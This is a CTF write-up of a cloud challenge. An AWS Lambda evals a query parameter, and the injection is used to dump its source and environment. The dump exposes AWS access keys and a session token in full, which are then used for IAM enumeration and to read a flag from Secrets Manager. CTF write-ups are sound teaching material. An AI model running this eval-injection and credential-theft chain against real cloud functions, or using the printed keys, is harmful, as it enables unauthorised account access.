Hello from API GW

Upon visiting the URL, the API Gateway rendered the text "Welcome to TetCTF!"

Based on my previous experience in solving similar CTF, I assumed that its API Gateway calling a Lambda Function, and that I need to perform RCE. I tried out different template injection via fuzzing and realize that its just a simple calculator, and 7*7
works.

The error message also suggest that it is running some form of JavaScript


Using a RCE payload, I am able to leak the source code as well as the environment variable.
https://huk5xbypcc.execute-api.ap-southeast-2.amazonaws.com/dev/vulnerable?vulnerable=require(%27fs%27).readFileSync(%27index.js%27).toString(%27utf-8%27)
exports.handler = async (event) => {
try {
if (event.queryStringParameters && event.queryStringParameters.vulnerable) {
let result = eval(event.queryStringParameters.vulnerable);
return {
statusCode: 200,
body: JSON.stringify({
message: "Evaluated User Input",
result: result
}),
};
}
return {
statusCode: 200,
body: JSON.stringify("Hello from Lambda")
};
} catch (error) {
return {
statusCode: 500,
body: JSON.stringify({
error: error.message
}),
};
}
};
https://huk5xbypcc.execute-api.ap-southeast-2.amazonaws.com/dev/vulnerable?vulnerable=require('fs').readFileSync('/proc/self/environ').toString()
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEBQaDmFwLXNvdXRoZWFzdC0yIkcwRQIhAMeg/PJqonDc4qfq7P63y7U3Vj0KsTw1pCh9gvUecuL8AiA9Z7SSZ/BCBBM7OwAFwr/Ug53v74GEalEOfLxSVYvBQCrFAwjN//////////8BEAMaDDU0MzMwMzM5Mzg1OSIMLmNanKGb1nPmehnXKpkDNg8VuP3WKEXVnBwcjJq0JVbLT/uUxbgBnqzt2VhK56wXvbhSIB4ZX7hyykuh+mD66e0p9a2e+tIFnRWbLA9osugkHFNwLXuQXD3b1m+n4oAhjBP5gNFprxuSfmx9mhFz0xNaD4EQqjljq8rBU3XCIC4rxDdayHyDKewvwQnrtvLuYD5udZJyUa1LOiEHPJcmsUVFRJ+7R2VzkF2OkX6fYjq7Vei3YYVKGsSK+7ZsGxV0tuOjWkUfFIKEPFVzDuZj8Xqy5bGp/ccrAof6Kj6dfCmcLxi7SICxYw+LxM7qx6DmJM9Gn8VQrk4hMgoM/OfjNgSpSTwr5CWAYb4xPTLTvt2CbqLbYHrvxNTgmBc0A9K8sE3r9v5n9vIofujKCPqqsjQp5STMDN9URSdHBKNFLyinTrMaQ5WBA/THDg9v7DpyxWGgL350zocO0e30Vqm+zsWtud8Ea+Jn6BYPM+Ectrnzf9ggYlmJavov5LVTreIgl4VRf2wgO6IqPuNb6xLDWOexZr9p2DvkPLHXH1N5DQ2IOKsHRhYa2jDyqdetBjqeAXK695/A+F/+F1GfaafqTqcY1MzUHVUGL/ORACTK3E6sMMGg/5DGJaTNuWWzlnmxSd6oKuOHW9s93RXO32umruWvhaHzz0ibshuT3xzh9hp9yLyJ756aN8r628E8OjTibNSZP59O4ZsvMTjzz5TB1swijs7Mw/bxy00DGVdfWY0s9nzG8RunlIJnK8GQ96WcUU1sFv5/3dQAcf00HVGL
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
LAMBDA_TASK_ROOT=/var/task
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR
AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001
AWS_LAMBDA_LOG_STREAM_NAME=2024/01/28/[$LATEST]997100646f654f0d8744d1fbc6bf221b
AWS_EXECUTION_ENV=AWS_Lambda_nodejs18.x
AWS_LAMBDA_FUNCTION_NAME=TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR
AWS_XRAY_DAEMON_ADDRESS=169.254.79.129:2000
PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
AWS_DEFAULT_REGION=ap-southeast-2
PWD=/var/task
AWS_SECRET_ACCESS_KEY=GDP3gUWtK0YCvjLu6hgfA/KWdeC2NYw40+4WjAsn
LAMBDA_RUNTIME_DIR=/var/runtime
LANG=en_US.UTF-8
AWS_LAMBDA_INITIALIZATION_TYPE=on-demand
NODE_PATH=/opt/nodejs/node18/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task
TZ=:UTC
AWS_REGION=ap-southeast-2
ENV_ACCESS_KEY=AKIAX473H4JB76WRTYPI
AWS_ACCESS_KEY_ID=ASIAX473H4JBRNS73MR6
SHLVL=0
ENV_SECRET_ACCESS_KEY=f6N48oKwKNkmS6xVJ8ZYOOj0FB/zLb/QfXCWWqyX
_AWS_XRAY_DAEMON_ADDRESS=169.254.79.129
_AWS_XRAY_DAEMON_PORT=2000
_LAMBDA_TELEMETRY_LOG_FD=3
AWS_XRAY_CONTEXT_MISSING=LOG_ERROR
_HANDLER=index.handler
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128
NODE_EXTRA_CA_CERTS=/var/runtime/ca-cert.pem
Now that we have the AWS Credentials, we can pivot to the cloud portion of the challenge.
First, I tried enumerating with AWS_ACCESS_KEY_ID
, AWS_SECRET_ACCESS_KEY
, and AWS_SESSION_TOKEN
; however, it quickly proved itself to be a red herring as there are no permissions configured.
I looked at the environment variable again, and reliaze there is an extra set of key being saved in environment variable, namely ENV_ACCESS_KEY
and ENV_SECRET_ACCESS_KEY
.

Next, I performed manual enumeration but couldnt get any results as the user does not have much permission.

I was stuck here for a while, and decided to use enumerate-iam
to help perform the enumeration. (ps i also used enumerate-iam for the previous part). Immediately, some interesting permission pop out.

Hindsight is 20/20, of course the secret-user will have permission on secretsmanager 🤦♂️
I am then able to just retrieve the flag from the secretsmanager.
aws secretsmanager list-secrets --profile tet
aws secretsmanager get-secret-value --secret-id prod/TetCTF/Flag --profile tet

Flag: TetCTF{B0unTy_$$$-50_for_B3ginNeR_2a3287f970cd8837b91f4f7472c5541a}
Reference
https://blog.appsecco.com/nodejs-and-a-simple-rce-exploit-d79001837cc6
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Not_defined
https://github.com/andresriancho/enumerate-iam
https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/
Last updated
Was this helpful?